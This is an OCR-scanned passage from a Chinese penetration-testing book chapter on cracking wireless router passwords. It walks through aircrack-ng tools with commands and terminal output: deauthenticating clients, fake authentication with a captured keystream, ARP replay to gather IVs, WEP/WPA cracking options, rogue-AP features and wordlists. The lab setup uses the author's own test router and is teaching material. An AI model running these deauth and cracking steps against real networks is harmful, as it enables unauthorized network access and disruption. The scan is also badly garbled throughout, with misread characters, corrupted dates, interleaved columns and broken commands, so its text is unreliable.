BSSID 的 MAC 地 址 为 1C:FA:68:01:2F:08 的 
流量 包 ， 并 将 抓 取 的 数据 包 保 存 为 wep002 
的 文件 。 下 图 为 运行 结果 。 


第 8 章 ”无 线路 由 器 的 密码 安全 策略 


CH 1 ][ Elapsed: 6 s ][ 2918-19-13 67:11 

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E55ID 
1C:FA:68:01:2F:08 -1 6 9 23 4 1 :1 WEP WEP <length: 6> 
BSSID STATION PWR Rate Lost Frames Probe 
1C:FA:68:01:2F:88 DC:6D:CD:66:FE:CB -16 0- 5e 29 30 


侈 提示 : 抓 取 数 据 分 为 两 块 显示 ， 第 一 人 人 
BSSID 代 表 AP 端 的 数据 ， 第 二 个 BSSID 代 
表 STA 端 的 数据 ， 当 指定 信道 抓 取 数 据 后 会 
多 出 一 个 RXQ 字 段 。 


捕获 认证 过 程 。 当 ariodump-ng 工 
具 捕 获 到 STA 与 AP 的 认证 过 程 ， 会 多 出 
keystream 字 段 ， 该 字段 也 被 称 为 窗 钥 流 ， 
便 有 可 能 计算 出 无 线路 由 的 认证 密码 ， 如 

下 图 所 示 。 


CH 1 ][ Elapsed: 42 s ][ 2918-19-13 97:38 ][ 149 bytes keystream: 1C:FA:68:91:2F:98 


BSSID PWR RxQ Beacons #Data, 半 /S CH MB ENC CIPHER AUTH ESSID 
1C:FA:68:01:2F:08 = 此。 可 121 77 5 1 S4e, WEP WEP SKA Test-601 
B55ID STATION PWR Rate Lost Frames Probe 


1C:FA:68:01:2F:68 DC:6D:CD:66:FE:CB -14 0 - 5e 5 189 Test-961 


2 ee 


aireplay-ng 是 一 个 注入 帧 的 工具 ， 主 4 i 
要 作用 es/ ey 这 些 数 据 流量 会 Bh 
被 用 于 aircrack-ng， 从 而 破解 WEP 和 WPA/ 回 沪 


站 Ce th 1 . 


WPA2 秘 钥 。aireplay-ng 里 包含 了 很 多 种 总 s@ 缠 
不 同 的 发 包 方式 ， 用 于 获取 WPA 握 手包 ， a 
aireplay-ng 当 前 文 持 的 发 包 种 类 有 9 种 ， 如 
下 图 所 示 。 


Attack modes (numbers can still be used): 

--deauth count : deauthenticate 1 or all stations (-@) 
--fakeauth delay : fake authentication with AP (-1) 
--interactive : interactive frame selection (-2) 
--arpreplay ; Standard ARP-request replay (-3) 
--Chopchop : decrypt/chopchop WEP packet (-4) 
--fragment : generates valid keystream (-5) 
--Caffe-Latte : query a client for new IVS (-6) 
--Cfrag : fragments against a client (-7) 
--migmode : attacks WPA migration mode (-8) 
--test : tests injection and quality (-9) 
--help : Displays this usage screen 


下 面 详细 介绍 发 包 种 类 中 各 个 参数 的 
含义 。 
--deauth count: 解除 认证 。 
--fakeauth delay: 伪造 认证 。 
--interactive: 交互 式 注 入 。 
--arpreplay: ARP 请 求 包 重 放 。 
--chopchop: 端点 发 包 。 
--fragment: 苹 片 交错 。 
--caffe-latte: 查询 客户 端 以 获取 新 
的 IVs。 
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e --cfrag: 面 问 客户 的 碎片 。 

e --migmode: WPA 迁 移 模 式 。 

e --test: 测试 网 卡 可 以 发 送 哪 种 类 型 

的 数据 包 。 

除了 解除 认证 〈-0) 和 伪造 认证 〈-1) 
以 外 ， 其 他 所 有 发 包 都 可 以 使 用 下 面 的 过 
滤 选 项 来 限制 数据 包 的 来 源 。-b 是 最 常用 的 
一 个 过 滤 选 项 ， 它 的 作用 是 指定 一 个 特定 
的 接 入 点 。 下 图 为 帮助 信息 。 


FiILEer options: 

-b bssid : MAC address, Access Point 

-d dmac : MAC address, Destination 

-S SMac : MAC address, Source 

-m Len : minimum packet Length 

-n Len : maximum packet Length 

-U type : frame control, type field 

-V subt : frame control, subtype field 

-七 tods : frame control, To DS bj 

-f fromds : frame control, From DS bj 

- iswep : frame control, WEP bat 
disable AP detection 


主要 参数 介绍 如 下 ; 
-b bssid : 接 入 点 的 MAC 地 址 。 
-d dmac: 目的 MAC 地 址 。 
-s smac: 源 MAC 地 址 。 
-m len: 数据 包 最 小 长 度 。 
-n len: 数据 包 最 大 长 度 。 
-utype: 含有 关键 词 的 控制 帧 。 
-V subt: 含有 表单 数据 的 控制 帧 。 
-ttods: 到 目的 地 址 的 控制 帆 。 
-f fromds: 从 目的 地 址 出 发 的 控 
制 帧 。 
e -wiswep: 含有 WEP 数 据 的 控制 帧 。 
当 需 要 重 放 (注入 ) 数据 包 时 ， 会 用 
到 重 放 选项 中 的 参数 ， 但 是 并 不 是 每 一 种 
发 包 都 能 使 用 所 有 的 选项 。 下 图 为 重 放 选 
项 帮助 信息 。 


Replay options: 


-x Nbpps : number of packets per second 
-p fctrl : set frame control word (hex) 
-da bssid : set Access Point MAC address 
-C dmac : Set Destination MAC address 
-h smac : Set Source MAC address 
-g value : change ring buffer Size (default: 8) 
-F : Choose first matching packet 


Fakeauth attack options: 


-e esSsid : set target AP SSID 
-0 npckts : number of packets per burst (0=auto, default: 1) 


-Q Sec : Seconds between keep-alives 

-Q : Send reassociation requests 

-y prga : keystream for shared key auth 

= 了 站 : exit after retry fake auth request n time 


Arp Replay attack options : 


- j : inject FromDs packets 
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主要 参数 介绍 如 下 : 
e -x nbpps: 设置 每 秒 发 送 数 据 包 的 
数目 。 
e -p fctrl: 设置 控制 帧 中 包含 的 信息 
(十 六 进 制 )。 
-a bssid: 设置 接 入 点 的 MAC 地 址 。 
-c dmac: 设置 目的 MAC 地 址 。 
-h smac: 设置 源 MAC 地 址 。 
-g value: 修改 缓冲 区 的 大 小 (默认 
值 : 8) 。 
-F: 选择 第 一 次 匹配 的 数据 包 。 
e -e essid: 虚假 认证 中 ， 设 置 接 入 点 
名 称 。 
e -onpckts: 每 次 发 包 时 包含 数据 包 的 
数量 。 
e@ -gq sec: 设置 持续 活动 时 间 。 
e -y prga: 包含 共享 秘 钥 的 关键 数 
aireplay-ng 有 两 个 获取 数据 包 来 源 ， 第 
一 个 是 无 线 网 卡 的 实时 通信 流 ， 第 二 个 则 
是 pcap 文 件 。 大 部 分 商业 的 或 开源 的 流量 
捕获 与 分 析 工 具 都 可 以 识别 标准 的 pcap 文 
件 。 从 pcap 文 件 读 取 数 据 是 Aireplay-ng 一 
个 经 常 被 忽视 的 功能 。 这 个 功能 可 以 从 捕 
捉 的 其 他 会 话 中 读 取 数据 包 。 注 意 ， 有 很 
多 种 发 包 会 在 发 包 时 生成 pcap 文 件 以 便 重 
复 使 用 。 
当 抓 取 指 定 AP 与 数据 时 ， 如 果 想 要 抓 
取 密 钥 必 须 在 AP 与 STA 开 始 建立 关联 时 开 
始 ， 此 时 如 果 已 经 有 合法 关联 的 STA， 为 
了 避免 一 直 等 待 它们 重新 关联 ， 可 以 使 用 
airepaly-ng -0 < 发 包 次 数 > -a <AP 的 MAC 地 
址 > -c <STA 的 MAC 地 址 > wlan0mon 命 令 
运行 效果 如 下 图 所 示 ， 将 已 经 关联 的 STA 与 
AP 断 开 连接 ， 正 第 情况 下 STA 与 AP 会 目 动 
重 连 。 


root@kali;-# ai hn mt ng 和 时 -是 a hosel he -C ene Eee haben en Gmon 
cha 


23:67:62 Waiting for beacon frame (BSSID: 1C:FA:68:61:2F:68) o 
23: it 82 Sending he dire ct i Be (code 7). STMAC: rm [ 2|55 ACKs] 
23:07:83 Sending 64 directed DeAuth (code 7), STMAC: [DC:6D:CD:66:FE:CB] [ 98|56 ACKs] 


23: | :64 Sending 64 directed DeAuth {code 7). STHAC: [DC:6D:C0:66:FE:CB] [ 9|52 ACks] 
23:67:64 Sending 64 directed DeAuth (code 7), STMAC: [DC:6D:CD:66:FE:CB] [ 86|58 ACKs] 


其 中 -0 后 面 的 参数 为 发 包 次 数 ， 如 果 指 


定 为 0 表示 不 停 地 发 送 。-c 后 面 的 参数 为 需 
要 解除 关联 的 客户 端 MAC 地 址 ， 如 果 不 指 
定 将 会 以 广播 的 形式 发 送 ， 解 除 所 有 与 AP 
天 联 的 客户 端 。 

使 用 抓 取 到 的 密 钥 流 进行 天 联 ， 可 以 
使 用 aireplay-ng -1 < 间隔 时 间 > -e <ESSID> 
-y < 密 钥 流 文件 > -a <AP-MAC 地 址 > -h < 需 
要 关联 的 客户 端 MAC 地 址 > 命令 ， 执 行 后 如 
下 图 所 未 。 


t@kal replay-ng -1 66 
81:2F:88 TY ee pe a ee le wlan 
B4:35:31 ing a 1C:FA:68:61:2F:68) on channel 1 


ed 661 -y wep-0l-1C-FA-68-01-2F-08.,x -9 1C:FA:68: 


B4:35:31 ng Authe i 
04:35:;31 ntic ep 7 


Sendi nl ee ep st (Shared Key) [ACK] 

Authe 5 
B4:35:31 Sending e crypre ed cha te cd [ACK] 

Authe micatio 

sendi 


| -i 


B84;35;31 Authenticatlion 2/2 successfyu 
B04:35:31 ng As ation Request [ACK] 
84;35;31 Associa ion su 


sful ;-) (AID: 1) 


当 无 线路 由 使 用 WEP 进 行 加 密 时 ， 
破解 密码 需要 抓 取 大 量 的 IV 值 ， 可 以 采 
用 抓 取 一 段 合 法 ARP 数 据 包 ， 然 后 使 用 
areplay-ng 工 具 发 送 大 量 的 ARP 数 据 包 ， 这 
种 方式 叫 重 放 ， 也 就 是 合理 数据 重复 发 
送 使 得 AP 大 量 回应 ARP， 在 回应 ARP 数 
据 包 中 包含 IV。 这 种 方式 前 提 是 必须 先 
建立 关联 ， 通 过 重 放 便 可 以 收集 IV 值 。 当 
收集 到 足够 数量 的 IV 时 ， 无 论 多 复杂 的 密 
码 都 可 以 被 计算 出 来 。 执 行 aireplay-ng -3 
-b <AP-MAC 地 址 > -h < 本 机 MAC 地 址 > 
wlan0mon 命 令 便 可 以 开始 重 放 ， 如 下 图 
所 示 。 


ot@kali:~# aireplay-ng -3 -b 1C:FA:68:91:2F:68 -h EB-4E-96-28-AE-46 Ee 
4: ee 49 Waiting for beacon os me (BSSID: 1C:FA:68:01:2F:08) on channel 
ing ARP requests in rep arp-1l16918-643949 .cap 
ou ushou 0 also start air od i ng to capture a 5, 


4 packets (got 9 ARP requests and 9 ACKs), sent 6 packets...(g pps) 


8.2.4 aircrack-ng 工 具 


aircrack-ng 是 一 个 802.11 的 WEP 和 WPA/ 
WPA2-PSK 破 解 程序 工具 。 一 旦 使 用 airo- 
dump-ng 抓 取 足 够 多 的 加 密 数据 包 以 后 ， 
aircrack-ng 可 以 用 来 破解 WEP 密 钥 。 

aircrack-ng 破 解 WEP 密 铀 有 3 种 方法 ， 
分 别 是 : PTW 方 法 、FMS/KoreK 方 法 和 词 
典 比 对 方法 。 

(1) PTW (Pyshkin, Tews, Wein- 
mann) 方法 。 是 破解 WEP 密 钥 的 默认 方 
式 ， 由 两 个 阶段 组 成 。 第 一 个 阶段 是 air- 
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crack-ng 只 使 用 ARP 包 ， 如 果 找 不 到 密 铀 ， 
再 尝试 捕捉 到 的 其 他 数据 包 。 要 知道 ， 并 
不 是 所 有 的 数据 包 都 可 以 用 来 进行 PTW 破 
解 。 目 前 PTW 方法 只 能 破解 40 位 和 104 
位 的 WEP 密 钥 。PTW 方法 的 优点 是 ， 只 
须 很 少 的 数据 包 就 可 以 破解 WEP 密 钥 。 

(2) FMS/KoreK 方法 。 包 含 了 很 多 统 
计 攻 击 方式 ， 并 且 结 合 了 欢 力 破解 方式 。 

(3) 词典 比 对 方法 。 而 对 于 WPA/ 
WPA2-PSK 共享 密 铀 ， 只 有 词典 比 对 这 一 
种 方法 。SEE2 则 可 以 极 大 地 加 速 这 个 漫长 
的 比 对 过 程 。 破 解 WPA/WPA2-PSK 时 ， 需 
要 一 个 四 次 握手 包 作 为 输入 。 对 于 WPA 来 
说 ， 需 要 4 个 包 才 能 完成 一 次 完整 的 握手 ， 
然而 aircrack-ng 只 要 其 中 的 两 个 就 能 够 开 
始 工作 了 。 

使 用 aircrack-ng 命 令 查看 其 帮助 信息 。 
下 图 为 执行 效果 。 


Aircrack-ng 1.4 - (C) 2006-2018 Thomas d'Ootreppe 
https://ww.aircrack-ng.org 


usage: aircrack-ng [options] <input file(s)> 


Common options: 


-a <amode> : force attack mode (1l/WEP, 2/WPA-PSK) 
-e <essid> : target selection: network identifier 
-b <bssid> : target selection: access point's MAC 


-p <nbcpu> : # of CPU to use (default: all CPUs) 
-q : enable quiet mode (no status output) 
-C <macs> : merge the given APs to a virtual one 
-L <file> : write key to file. Overwrites file. 


主要 参数 介绍 如 下 : 

e -a <amode>: 强力 攻击 模式 (1/ 
WEP, 2/WPA-PSK) 。 

e@ -e <essid>: 目标 选择 : 网 络 标 让 


符 。 和 

e -b <bssid>: 目标 选择 : 接 入 点 的 
MAC。 

e -p <nbcpu>: 使 用 的 CPU 默认: 所 
有 CPU) 。 

。-q: 启用 静音 模式 〈 无 状态 输 
Hh》。 

e -C <macs>: 将 给 定 的 AP 合并 到 一 
个 虚拟 的 AP。 


e -] <file>: 写 入 文件 密 钥 。 


WA 
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下 图 为 WEP 设 置 相 关 的 选项 。 


e -s: 破解 时 显示 密 钥 的 ASCII 值 。 

e -M <num>: 指定 最 大 使 用 的 IVs 
(初始 向 量 ) 。 

e -D: WEP 伪 装 ， 跳 过 坏 掉 的 密 
钥 流 。 

e -P <num>: PTW 排 错 :1: 取 消 Klein 
(方式 ) ，2:PTW 

e -l: 只 运行 一 次 答 试 用 PTW 破 解 


static WEP cracking options : 

C : Search alpha-numeric characters only 
t : search binary coded decimal chr only 
-h : Search the numeric key for Fritz'!BOX 
d <mask> : use masking of the key (Al:XX:CF:YY) 
-m <maddr> : MAC address to filter usable packets 
-n <nbits> : WEP key Length : 64/128/152/256/512 
-i <index> : WEP key index (1 to 4), default: any 
-f <fudge> : bruteforce fudge factor, default: 2 
-k <korek> : disable one attack method (1 to 17) 
-X Or -x© : disable bruteforce for last keybytes 
-X1 : last keybyte bruteforcing (default) 
-X2 : enable last 2 keybytes bruteforcing 
-X : disable bruteforce multithreading 
-y : experimental single bruteforce mode 
-K : Use only old KoreK attacks (pre-PTW) 
-S : Show the key in ASCII while cracking 
-M <num> : Specify maximum number of IVs to use 
-D : WEP decloak, skips broken keystreams 
-P <num> : PTW debug: 1: disable Klein, 2: PTW 
-1 : run only 1 try to crack key with PTW 
-V : run in visual inspection mode 


主要 参数 介绍 如 下 : 


-c: 只 搜索 字母 数字 字符 。 
-t: 只 搜索 二 进 制 编码 的 十 进 制 
字符 。 


e -h: 搜索 弗 里 次 的 数字 键 。 
e -d <mask>: 使 用 密 钥 过 小 (Al1:XX: 


CE YYY » 

-m <maddr>: MAC 地 址 用 以 过 滤 抒 
无 用 数据 包 。 

-n<nbits>: WEP 密 钥 长 度 : 
64/128/152/256/512 

- i <index>: WEP 密 钥 索 引 (1 一 
4) ， 默 认 值 : 任何 。 

-f <fudge>: 和 穷 举 猜测 因子 ， 默 认 
值 : 2。 

-k <korek>: 茶 用 一 个 攻击 方法 〈1 一 
17) 。 

-x or -Xx0: 最 后 一 个 密 钥 字 节 进行 穷 
举 〈 默 认 ) 。 

-x1: 取消 最 后 一 个 密 钥 字 节 的 穷 举 
(默认 ) 。 

-x2: 设置 最 后 两 个 密 钥 字 节 进行 


e -X: 茶 用 多 线程 穷 举 。 
e -y: 实验 性 的 单一 穷 举 模式 。 
e -KK: 只 使 用 旧 的 KoreK 攻 击 (pre- 
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PTW) 。 


e -V: 在 目 视 检查 模式 下 运行 。 
下 图 为 WEP 和 WPA-PSK 破 解 选项 。 


WEP and WPA-PSK cracking options : 


-Ww <words> : path to wordlist(s) filename(s) 
-N <file> : path to new session filename 
-R <file> : path to existing session filename 


主要 参数 介绍 如 下 : 

e -w <words>: 路 径 表 〈s) 的 文件 名 
(Bs 

e -N <file>: 新 会 话 文件 名 的 路 径 。 

e@ -R <file>: 现 有 会 话 文件 名 的 路 径 。 

下 图 为 WPA-PSK 的 一 些 选 项 。 


WPA-PSK options : 


<file> 
<file> 


E : Create EWSA Project file v3 
] 

-] <file> 

一 

Z 


: Create Hashcat v3.6+ file (HCCAPX) 

: Create Hashcat file (HCCAP) 

: WPA cracking speed test 

<SeC> : WPA cracking Speed test Length of 
execution. 

: path to airolib-ng database 
(Cannot be used with -w) 


主要 参数 介绍 如 下 : 

e -FE <file>: 创建 项 目 文件 EWSA v3。 
e -J <file>: 创建 Hashcat 捕 获 文件 。 

e -S: WPA 破 解 速度 测试 。 


-Tr <DB> 


8.2.5 airbase -ng 工具 


airbase-ng 作 为 多 目标 的 工具 ， 通 常 将 
自己 伪装 成 AP 攻击 客户 端 。 该 工具 的 功能 
丰富 多 样 ， 常 用 的 功能 特性 如 下 : 

e 实施 caffe-latte WEP 攻 击 。 

e 实施 hirte WEP 客 户 端 攻击 。 

e 抓 取 WPA/WPA2 认 证 中 的 handshake 

数据 包 。 


伪装 成 AD-Hoc AP。 
完全 伪装 成 一 个 合法 的 AP。 

e 通过 SSID 或 者 和 客户 端 MAC 地 址 进 
行 过 滤 。 

e 操作 数据 包 并 且 重 新 发 送 。 

e 加 密 发 送 的 数据 包 以 及 解密 抓 取 的 

数据 包 。 

该 工具 的 主要 目的 是 让 客户 端 连 接 上 
伪装 的 AP， 而 不 是 阻止 它 连接 真实 的 AP， 
当 airbase-ng 运 行 时 会 创建 一 个 tap 接 口 ， 这 
个 接口 可 以 用 来 接收 解密 或 者 发 送 的 加 密 
数据 包 。 

一 个 真实 的 客户 端 会 发 送 probe re- 
quest, 在 网 络 中 ， 这 个 数据 帧 对 于 绑 定 客 
户 端 到 伪装 AP 上 具有 重要 的 意义 。 在 这 
种 情况 下 伪装 的 AP 会 回应 任何 的 probe re- 
quest。 建议 最 好 使 用 过 滤 以 防止 附近 所 有 
的 AP 都 会 被 影响 

下 图 为 airbase-ng 工 具 的 命令 格式 及 参 
数 说 明 。 


hsage: airbase-ng <options> <replay interface> 


Dptions: 
a bssid : Set Access Point MAC address 
i iface : capture packets from this interface 
WwW WEP key : Use this WEP key to en-/decrypt packets 
h MAC : Source mac for MITM mode 


M 
-f disallow 
-W 8@|1 


: disallow specified client MACs (default: allow) 

: [don't] set WEP flag in beacons 0|1 (defautt: auto) 
: guiet [do not print statistics) 

: verbose (print more messages) 

- : Ad-Hoc Mode (allows other clients to peer) 

-Y in|out|both 
-C channel 


q 
A 
Y : external packet processing 

C : sets the channel the AP is running on 

X : hidden ESSID 

5 : force Shared key authentication (default: auto) 
= 五 : Set Shared key challenge Length (default: 128) 
= 上 : Caffe-Latte WEP attack (use if driver can't Send frags]) 
N : Cfrag WEP attack (recommended) 

X : number of packets per second (defauLt: 199) 

y : disables responses to broadcast probes 

0 : Set all WPA,WEP,open tags. can't be used with -zz & -Zz 


Z type : Sets WPA1L tags. 1=WEP48 2=TKIP 3=WRAP 4=CCMP 5=WEP164 
Z type : Same as -Zz, but for WPA2 

V typ : fake EAPOL 1=MD5 2=SHA1 3=auto 

F prefi : write all sent and received frames into pcap file 


: respond to all probes, even when specifying ESSIDs 

: sets the beacon interval value in ms 

: enables beaconing of probed ESSID values (requires -P) 
: User specified ANonce when doing the 4-way handshake 


主要 参数 介绍 如 下 : 

e -a: 设置 软 AP 的 ssid。 

e -i: 接口 ， 从 该 接口 抓 取 数 据 包 。 

e -w: 使 用 WEP key 加 密 /解密 数 
据 包 。 

e -h MAC: 源 MAC 地 址 (在 中 间 人 攻 
击 时 的 MAC 地 址 ) 。 


-I interval 
-C seconds 
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-f disallow: 不 容许 某 个 客户 端的 
MAC 地 址 (默认 为 容许 ) 。 

-W 0|1: 不 设置 WEP 标 志 在 beacon 
(默认 容许 ) 。 

-js 退出 。 

-Vv(--verbose) : 显示 进度 信息 。 
-A: ad-hoc 对 等 模式 。 

-Y inloutlboth: 数据 包 处 理 。 

-c: 信道 。 

-X: 隐藏 ESSID。 

-s: 强制 的 将 认证 方式 设 为 共享 密 
钥 认 证 。 

-S: 设置 共享 密 钥 的 长 度 ， 默 认为 
128bit。 


e -L: caffe-Latte 攻 击 。 
e -N: hirte 攻 击 ， 产 生 ARP request 


against WEP 客 户 端 。 


e -x nbbps: 每 秒 的 数据 包 。 
e -y: 不 回应 广播 的 probes request 


(只 回应 携带 SSID 的 单 播 probe 
request) 。 
-Z: 设置 WPA1 的 标记 ，1 为 WEP40， 
2 为 TKIP，3 为 WRAP，4 为 CCMP， 
5 为 WEP104 ( 即 不 同 的 认证 方 
is 
-Z: 和 -z 作 用 一 样 ， 
WPA2。 
-V: 欺骗 EAPOL，1 为 MD5，2 为 
SHA1，3 为 自动 。 
-F xxx: 将 所 有 收 到 的 数据 帧 放 到 文 
件 中 ， 文 件 的 前 级 为 xxx。 
-P: 回应 所 有 的 probes request， 包 括 
特殊 的 ESSID。 
-I: 设置 beacon 数 据 帧 的 发 送 间 隔 ， 
单位 ms。 
-C: 开启 对 ESSID 的 beacon。 


只 是 针对 


下 图 为 Airbase-ng 工 具 的 文件 选项 


说 明 。 


| 
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FiLLer Oons 


--bssid MAC : BSSID to filter/use 
--bssids file : read a list of BSSIDs out of that file 
--Client MAC : MAC of client to filter 


: read a list of MACs out of that file 
: specify a single ESSID (default: default] 
: read a list of ESSIDs out of that file 


--CLients file 
--essid ESSID 
--essids file 


主要 参数 介绍 如 下 : 

© --bssid MAC|: 

e --bssids file: 根据 文件 中 的 BSSID 来 

e --client MAC: 让 制定 MAC 地 址 的 客 
户 端 连接 。 

e@ --clients file: 让 文件 中 的 MAC 地 址 
的 客户 端 可 以 连接 上 。 

e --essid ESSID: 创建 一 个 特殊 的 
ESSID。 


© --essilds file: 


ESSID 来 过 滤 。 


8.3 使 用 工具 破解 无 线路 由 奏 
密码 


无 线路 由 器 密码 的 安全 强度 是 进入 
无 线 网 络 的 关键 ， 要 想 从 无 线路 由 器 进入 
内 网 ， 就 必须 知道 无 线路 由 器 的 密码 ， 使 
用 一 些 破解 工具 可 以 破解 出 无 线路 由 器 的 
密码 。 


根据 AP 的 MAC 来 


根据 一 个 文件 中 的 


使 用 aircrack-ng 破 解 WEP 密 码 
使 用 aircrack-ng 工 具 可 以 破解 WEP 加 密 


方式 的 无 线路 由 密码 。 破 解 之 前 ， 首 先 登录 


无 线路 由 器 ， 在 “无 线 设置 ”中 将 “无 线 安 
全 设置 ”设置 成 WEP 加 密 ， 如 下 图 所 示 。 
修改 加 密 方式 后 需 重启 路 由 器 才能 生效 。 


WEP 
认证 类 型 : 
#E? 密 钥 格 式 : 
密 钥 选择 WEF 密 家 密 角 类 型 
1: 6 


密 钥 2: [|[ 煞 8 _"] 
密 钥 3: [ | 鳃 "| 
密 钥 4: EE 
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破解 WEP 密 码 的 具体 操作 步骤 如 下 : 
执行 airmon-ng strat wlan0 人 命令， 局 
动 网 卡 并 进入 monitor 模 式 ， 下 图 为 执行 
效 采 。 


roote@kali:-~# airmon-ng start WLang 


PHY Interface Driver Chipset 


phy1 wlang rt288@usb Ralink Technology, Corp. RT287@/RT387@ 
[mac8B211 monitor mode vif enabled for [phyljwlanB on [phyl]jwLangmon) 
[mac8B211 station mode vif disabled for |phyl1jwLane) 


执行 airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 
Wlan0mon 命 令 ， 启 动 数 据 抓 包 功 能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


cH 1 ][ Elapsed: 6 5 ][ 2918-16-18 94;:68 


BSSID PWR RXD Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
1C:FA:;68:;01;2F:;08 -B 48 25 3 昌 1 54e，WEP WEP Test-691 
BSSID 5TATION PWR Rate Lost Frames Probe 
l1C:FA:68:01:2F:086 DC;6D:CD:66;FE:C6 -12 日 - 6e 8 3 


如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


root@kali:~# aireplay-ng -9 1 -a lC:FA:68:B01:2F:98 -C ede wlanemon 
64:15:66 Waiting for beacon frame (BSSID: 1C:FA:68:01:2F:88) on cha 
64:15:87 Se ndin ng 64 directed DeAuth (code 7). STMAC: i IE [ 68|55 ACKS] 


此 时 会 抓 取 到 AP 与 STA 关 联 时 的 密 铀 
流 ， 下 图 为 抓 取 的 密 钥 流 。 


CH 1 ][ Elapsed: 3 mins ][ 2818-18-18 B84:12 ][ 146 bytes keystream: 1C:FA:68:0]1:2F:88 
BSSID PWR Rx0 Beacons #Data, #/5 CH MB ENC CIPHER AUTH ESSID 
1C:FA:68:@1:2F:08 BB 58 986 164 4 1 S4e. WEP WEP SKA Test+t-691 
BSSID STATION PWR Rate Lost Frames Probe 
1C:FA:68:01:2F:08 DC:6D:CD:66:FE:CB -14 0 - 9e 22 159 


执行 ls 命令 ， 查 看 当前 目录 可 以 发 现 
有 一 个 .xor 结 尾 的 文件 ， 这 个 文件 保存 着 
STA 关 联 AP 的 黎 钥 流 ， 如 下 图 所 示 。 


root@kali:~# Ls 


esktop Pictures wep-61l-1LC-FA-68-91-2F-08.xor wep-6l.kismet.netxnmL 
oOocumen t Publzi wep-01,cap 

ownload Templates wep-QOl.csv 

usic Videos wep-01.kismet.csv 


利用 XOR 文 件 与 AP 建立 关联 ， 一 
名 te 钥 流 便 可 以 将 任意 主机 与 AP 
进行 关联 ， 使 用 aireplay-ng -1 < 间隔 时 
间 > -e <ESSID> -y < 窗 钥 流 文 件 > -a <AP- 
MAC 地 址 > -h < 需要 建立 关联 的 MAC 地 
址 > wlan0mon 命 令 ， 可 以 使 本 机 与 AP 建立 
关联 ， 如 下 图 所 示 。 
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root®@kali:~# aireplay-ng -1 66 -e Test-08] -y wep-bl-lLC-FA-568-901-2F-68.xor -a 1C:FA:68: 
61:2F:68 -h E8-4E-66-28-AE-46 wlanemon 


B4;35;31 Waiting for beacon frame [BSSID; 1C:FA:;68:;@1:;2F:;88) on channel 1 总 提示 = 一 一 马 收 集 到 | 在 的 多 多 的 TV 9 那 从 


RE 破解 WEP 密 码 的 速度 就 非常 决 ， 所 以 采用 
de, | WEP 加 密 是 不 安全 的 。 

执行 ARP 重 放 收集 IV 数 据 ， 执 行 ARP 

重 放 需 要 先 获取 一 个 有 效 ARP 数 据 ， 本 机 ”8.3.2 ”使 用 aircrack-ng 破 解 WPA 密 码 。 癌 向 站 
只 是 与 AP 建立 了 关联 并 不 能 进行 通信 ， 所 破解 WPA 与 WEP 不 同 ，WEP 需 要 收集 吕 胰 江 
以 还 需要 抓 取 一 个 有 效 ARP 通 信 ， 此 时 可 大量 IV 数 据 ， 而 WPA 只 要 抓 取 四 次 握手 信 

以 执行 aireplay-ng -3 -b <AP-MAC 地 址 > -h 息 即 可 ， 但 是 如 果 字 典 文件 中 没有 密码 是 

< 本 机 MAC 地 址 > wlan0mon 命 令 ， 如 下 图 破解 不 出 来 的 。 

所 示 。 


AT 四 广 一 

oot@Kkali:-# aireplay-ng -3 -b iC:FA:68:01:2F:68 -h EB-4E-06-26-AE-46 WULangmon 1 认识 字典 X 件 
4:39:49 Waiting for beacon frame (BSSID: 1C:FA:68:01:2F:08) on channel 1 

aving ARP requests ln replay arp-1918-9643949 .cap 


ph edemad he ed 8 packets...(g pps) Kali 中 本 和 号 日 天 上 一 些 字 典 文 件 ， 查看 
再 次 解除 AP 与 STA 关 联 ， 和 触发 真实 目 带 字 典 文件 的 方法 如 下 。 


的 ARP 数 据 包 ， 产 生 以 replay arp 开 头 的 文 (1) rr 录 下 的 password. 
件 ， 如 下 图 所 示 。 lst 字典 文件 ， 如 下 图 所 示 。 


root@kal1i: /usr/share/john# Ls 


Lnum .chr dumb16 .conf korelogic.conf Lowerspace.chr uppernum.chr 
root@kali:-# 15 lnumspace,.chr dumb32,conf lanman ,chr password, lst utf8, chr 
Desktop Pictyres replay arp-1916-614337,cap wep-91,cap lpha, chr dynamic, conf latinl, chr regex alphabets,conf 
Documents Public Templates wep-81,.csyv scii.chr dynamic flat sse formats.conf Un ascii.chr repeats16. conf 
Downloads replay arp-1918-912799,cap Videos wep-91,Kkismet,csy ronjob john. conf Lower - chr repeats32. conf 

usic replay arp-1918-813325,cap Wep-91-1C-FA-68-91-2F-98.xor Wep-9l,kismet,.netxmt igits.chr john. local .conf lowernun, chr Upper,chr 


当 产 生 这 个 ARP 合 法 数据 包 后 ， 便 会 (2) /usr/share/wfuzz/wordlist/general 目 
开始 真正 的 ARP 重 放 ， 如 下 图 所 示 。 录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/general# ls -lah 
rootGkati;-# aireplay-ng -3 -b 1C:FA;68:91;ZF:98 -h E68-4E-66-28-AE-46 WLanemon 总 用 量 488K 
IB4:44:21 Waiting for beacon frame (BSSID: 1C:FA:68:91:2F:68) on channel 1 drwxr-xr-x 2 root root 4.0K 10 月 8 00:58  . 
Saving ARP requests in replay arp-1618-644422 ,cap ， 
You should also start airodump-ng to capture replies. drwxr-xr-x 8 root root 4.6K 8 月 21 96:52 .. 
ead 16658 packets (got 2418 ARP requests and 3666 ACKs), sent 4252 packets...(499 pps) -rw-r--r-- 1 root root 2.5K 3 月 25 2918 admin-panels.+txt 
-rw-r--r-- 1 root root 22K 3 月 25 2018 big.txt 
-rw-r--r-- 1 root root 1.2K 3 月 25 2018 catala.txt 
区 的 集 IV 集 的 TT / 值 越 多 越 -rw-r--r-- 1 root root 6.4K 3 月 25 2018 common.txt 
尽量 多 收 > 收 -rw-r--r-- 1 root root 278 3 月 25 2018 euskera.txt 
, -rw-r--r-- 1 root root 141 3 月 25 2018 extensions common .txt 
[eg rz bad 
容易 破解 出 深 码 ， dp 下 图 所 示 。 -rw-r--r-- 1 root root 238 3 月 25 2018 http methods.+txt 
-rw-r--r-- 1 root root 12K 3 月 25 2018 medium.txt 
